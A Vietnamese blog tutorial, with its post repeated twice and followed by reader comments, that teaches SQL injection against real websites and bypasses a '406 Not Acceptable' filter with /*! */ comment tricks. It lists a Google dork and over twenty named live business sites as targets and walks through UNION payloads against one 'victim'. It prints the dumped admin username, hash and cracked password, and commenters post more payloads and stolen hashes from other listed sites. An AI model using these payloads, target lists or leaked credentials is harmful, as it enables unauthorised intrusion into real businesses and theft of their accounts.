Trong các bài trước , Vô Ưu đã giới thiệu các bạn phương pháp khai thác sql inject Khai thác lỗi cơ bản, Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.
Hôm nay Vô Ưu sẽ demo 1 dạng bypass “406 Not Acceptable”
Google dork: Designed by Viet Arrow id=
Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ
http://www.duythinh.com.vn/?do=product&id=48%27
http://www.quangdao.vn/?do=supply&id=3%27
http://www.ttasia.com.vn/?do=services&id=14%27
http://www.lilama45-1.com/index.php?do=subcat&id=2%27&lang=vn
http://www.royalstone.com.vn/?do=products&act=detail&id=54%27&lang=vn
http://www.fsec.com.vn/index.php?do=intro&id=6%27
http://www.pcphumy.com/?do=projects&act=detail&id=19%27
http://www.vinhsang.com/?do=intro&id=3%27
http://www.sosani.com/?do=products&act=detail&cat_id=39&id=144%27&lang=en
http://mayphatdien.net.vn/index.php?do=products&act=list&p_cid=1&p_pid=202%27&l=2
http://dichvuduongsat.com/?do=services&act=detail&id=5%27&lang=en
http://www.caohungco.vn/index.php?do=products&act=detail&cid=74&id=128%27&lang=en
http://dichvuduongsat.com/?do=services&act=detail&id=4%27
http://www.shopdiep.com/index.php?do=products&act=detail&cid=63&id=1606%27
http://suthienthanh.com/?do=products&act=detail&id=23%27&lang=en
http://www.hoanmyco.com/index.php?do=news&act=detail&id=104%27
http://www.locanresort.com/index.php?do=page&id=1%27
http://www.ttasia.com.vn/?do=services&id=14%27
http://www.clicktoner.vn/index.php?do=page&id=2%27
http://vietdoantravel.com/index.php?do=page&id=2%27
http://sieuthihangchatluong.com/?Id=EStore&Act=View&Man=SanPham&DoanhNghiep=adminva&Cat=acde6754ab29d3c3b521f86041b88834%27
Vô Ưu sẽ chọn 1 victim bất kỳ để khai thác.
Victim: http://www.ttasia.com.vn/?do=services&id=14
Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản
Bước 1: Check lỗi
Thêm dấu ‘ vào sau con số của đường link có dạng id=
http://www.ttasia.com.vn/?do=services&id=14
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli
Bước 2: Tìm số trường cột
http://www.ttasia.com.vn/?do=services&id=14 order by 4-- - giao diện site bình thường
http://www.ttasia.com.vn/?do=services&id=14 order by 5-- - giao diện site thay đổi
Vì vậy, số trường cột là 6
Bước 3: Xác định vị trí trường cột bị lỗi
http://www.ttasia.com.vn/?do=services&id=-14 UNION SELECT 1,2,3,4-- -
Đến đây nếu khai thác bình thường sẽ bị chặn lại và xuất hiện 406 Not Acceptable, 80% site bị lỗi này chúng ta có thể bypass thành công bằng cách thêm /*! */ ở ở query “select”, “table_name”, “tables “ và “column_name”.
http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,3,4-- -
Ta thấy xuất hiện số 3, nghĩa nghĩa tại vị trí sô 3, trường cột bị lỗi. Vì thế ta sẽ khai thác tại vị trí này.
Lưu ý phải có dấu – sau con số 1 để xuất hiện vị trí trường cột bị lỗi hay còn gọi là số đẹp.
Bước 4: Xuất ra tên các tables trong database
http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(table_name))),4 from information_schema.tables where table_schema=database()-- -
Đến bước này cũng bị chặn và xuất hiện thông báo tương tự như trên, ta tiếp tục bypass bằng các thêm /*! */ ở table_name và tables
http://www.ttasia.com.vn/?do=services&id=-14 /*!UNION*/ /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!table_name*/))),4 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
Thông tin các tables thu được:
admin,banners,counter,intro,intropages,links,news,projects,services
Tables chứa thông tin về username và password là admin. Vì vậy ta sẽ tiếp tục khai thác tables này.
Bước 5: Xuất ra tên các colums chứa username và password
http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4 from information_schema./*!columns*/ where /*!table_schema*/=database() and /*!table_name*/=0x61646d696e-- -
Thông tin các columns trong tables admin thu được:
id,username,password,email
Lưu ý:
- 0x tạm hiểu là dùng để nhận dạng khi sử dụng ở dạng mã hex
- 61646d696e là ký tự admin ở dạng hex.
- Link convert các ký tự sang mã hex:
http://string-functions.com/string-hex.aspx
Bước 6: Xuất ra thông tin của Username và Password
http://www.ttasia.com.vn/?do=services&id=14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(username,0x2f,password))),4,5,6 from admin-- -
Thông tin về username và password được mã hóa md5 thu được:
nguyen|2a634ab368043b4a026d7b4b52c06f4e
Bước 7: Crack Password và tìm link admin:
- Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/
ta thu được
user: nguyen
pass: zinlibra
Bước 8 Mò link admin thì các bạn có thể tham khảo một số tool như
web admin finder để tìm
http://sinhvienit.net/forum/attachment/3204/1274558045/SinhVienIT.Net---Web%20Admin%20Finder.rar.html
Sau khi tìm được link admin chúng ta sẽ tiến hành đăng nhập bằng tài khoản và mật khẩu thu được ở bước số 7
MỌI THẮC MẮC CÁC BẠN ĐỂ LẠI COMMENTS PHÍA DƯỚI MÌNH SẼ GIẢI ĐÁP HỖ TRỢ
Hôm nay Vô Ưu sẽ demo 1 dạng bypass “406 Not Acceptable”
Google dork: Designed by Viet Arrow id=
Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ
http://www.duythinh.com.vn/?do=product&id=48%27
http://www.quangdao.vn/?do=supply&id=3%27
http://www.ttasia.com.vn/?do=services&id=14%27
http://www.lilama45-1.com/index.php?do=subcat&id=2%27&lang=vn
http://www.royalstone.com.vn/?do=products&act=detail&id=54%27&lang=vn
http://www.fsec.com.vn/index.php?do=intro&id=6%27
http://www.pcphumy.com/?do=projects&act=detail&id=19%27
http://www.vinhsang.com/?do=intro&id=3%27
http://www.sosani.com/?do=products&act=detail&cat_id=39&id=144%27&lang=en
http://mayphatdien.net.vn/index.php?do=products&act=list&p_cid=1&p_pid=202%27&l=2
http://dichvuduongsat.com/?do=services&act=detail&id=5%27&lang=en
http://www.caohungco.vn/index.php?do=products&act=detail&cid=74&id=128%27&lang=en
http://dichvuduongsat.com/?do=services&act=detail&id=4%27
http://www.shopdiep.com/index.php?do=products&act=detail&cid=63&id=1606%27
http://suthienthanh.com/?do=products&act=detail&id=23%27&lang=en
http://www.hoanmyco.com/index.php?do=news&act=detail&id=104%27
http://www.locanresort.com/index.php?do=page&id=1%27
http://www.ttasia.com.vn/?do=services&id=14%27
http://www.clicktoner.vn/index.php?do=page&id=2%27
http://vietdoantravel.com/index.php?do=page&id=2%27
http://sieuthihangchatluong.com/?Id=EStore&Act=View&Man=SanPham&DoanhNghiep=adminva&Cat=acde6754ab29d3c3b521f86041b88834%27
Vô Ưu sẽ chọn 1 victim bất kỳ để khai thác.
Victim: http://www.ttasia.com.vn/?do=services&id=14
Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản
Bước 1: Check lỗi
Thêm dấu ‘ vào sau con số của đường link có dạng id=
http://www.ttasia.com.vn/?do=services&id=14
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli
Bước 2: Tìm số trường cột
http://www.ttasia.com.vn/?do=services&id=14 order by 4-- - giao diện site bình thường
http://www.ttasia.com.vn/?do=services&id=14 order by 5-- - giao diện site thay đổi
Vì vậy, số trường cột là 6
Bước 3: Xác định vị trí trường cột bị lỗi
http://www.ttasia.com.vn/?do=services&id=-14 UNION SELECT 1,2,3,4-- -
Đến đây nếu khai thác bình thường sẽ bị chặn lại và xuất hiện 406 Not Acceptable, 80% site bị lỗi này chúng ta có thể bypass thành công bằng cách thêm /*! */ ở ở query “select”, “table_name”, “tables “ và “column_name”.
http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,3,4-- -
Ta thấy xuất hiện số 3, nghĩa nghĩa tại vị trí sô 3, trường cột bị lỗi. Vì thế ta sẽ khai thác tại vị trí này.
Lưu ý phải có dấu – sau con số 1 để xuất hiện vị trí trường cột bị lỗi hay còn gọi là số đẹp.
Bước 4: Xuất ra tên các tables trong database
http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(table_name))),4 from information_schema.tables where table_schema=database()-- -
Đến bước này cũng bị chặn và xuất hiện thông báo tương tự như trên, ta tiếp tục bypass bằng các thêm /*! */ ở table_name và tables
http://www.ttasia.com.vn/?do=services&id=-14 /*!UNION*/ /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!table_name*/))),4 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
Thông tin các tables thu được:
admin,banners,counter,intro,intropages,links,news,projects,services
Tables chứa thông tin về username và password là admin. Vì vậy ta sẽ tiếp tục khai thác tables này.
Bước 5: Xuất ra tên các colums chứa username và password
http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4 from information_schema./*!columns*/ where /*!table_schema*/=database() and /*!table_name*/=0x61646d696e-- -
Thông tin các columns trong tables admin thu được:
id,username,password,email
Lưu ý:
- 0x tạm hiểu là dùng để nhận dạng khi sử dụng ở dạng mã hex
- 61646d696e là ký tự admin ở dạng hex.
- Link convert các ký tự sang mã hex:
http://string-functions.com/string-hex.aspx
Bước 6: Xuất ra thông tin của Username và Password
http://www.ttasia.com.vn/?do=services&id=14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(username,0x2f,password))),4,5,6 from admin-- -
nguyen|2a634ab368043b4a026d7b4b52c06f4e
Bước 7: Crack Password và tìm link admin:
- Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/
ta thu được
user: nguyen
pass: zinlibra
Bước 8 Mò link admin thì các bạn có thể tham khảo một số tool như
web admin finder để tìm
http://sinhvienit.net/forum/attachment/3204/1274558045/SinhVienIT.Net---Web%20Admin%20Finder.rar.html
Sau khi tìm được link admin chúng ta sẽ tiến hành đăng nhập bằng tài khoản và mật khẩu thu được ở bước số 7
MỌI THẮC MẮC CÁC BẠN ĐỂ LẠI COMMENTS PHÍA DƯỚI MÌNH SẼ GIẢI ĐÁP HỖ TRỢ
Tks !
ReplyDeleteEm đang tập bằng cái link đầu tiên thì tới đây bí a giúp e với
ReplyDeletewww.duythinh.com.vn/?do=product&id=-48 /*!UNION*/ /*!SELECT*/ 1,2,3,4,unhex(hex(group_concat(/*!table_name*/))),6 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
Nó không hiện các colums thì mình nên làm zì hả a
E dựa theo cách viết của a... Lỗi ở vị trí 5 trường cột bị lỗi... Thì ghi lại 1,2,3,4 còn 5 thì unhex... ở khúc (/*!table_name*/))) thì ghi số sau 5 là 6 phải k a
Mong a rép sớm e còn test hết :)
sr bây giờ mới REP được lý do là mình bị ẩn commets do thằng google+ cập nhập phiên bản nên mình bị mất chức năng này khi chưa cập nhập bây giờ mình mới giúp được bạn :)
Deletebạn chuyenr -48 thành null xem được không?
cái slq injection này có xảy ra trên wordpress ko vậy Vi?
ReplyDeletehoàn toàn có thể bất cứ mã nguồn nào cũng có thể mắc phải a
Deletehoàn toàn có thể anh a
ReplyDeleteNhiều người hay thắc mắc hướng dẫn cài đặt phần mềm opera cho máy tính có giúp làm máy tính nhẹ hơn không, ngoài ra hướng dẫn cài đặt cốc cốc cho máy tính cũng có thể giúp máy tính dowload nhưng bộ phim hay, hướng dẫn cách cài đặt skpye cho máy tính sẽ giúp bạn dễ dàng hơn trong việc giao tiếp với những người ở xa huong dan sua dns giúp bạn dễ dàng sử dụng facebook hơn
ReplyDeletead ơi cho tớ hỏi với tớ làm theo cái trang 2 ra được rồi đến bước cuối cùng ko đăng nhập được vô nữa. giúp tớ với
ReplyDeletehttp://www.quangdao.vn/?do=supply&id=-3 UNION /*!SELECT*/ 1,unhex(hex(group_concat(username,0x2f,password))),3 from admin-- -
không biết cái nào là id cái nào là mật khẩu hay là nó mã hóa MD5 cả 2
kết quả:
ReplyDeleteadmin/ffe376b2edc73f0d8,quangdaoco/2e897f3bf26a434c14cf38930e15ece1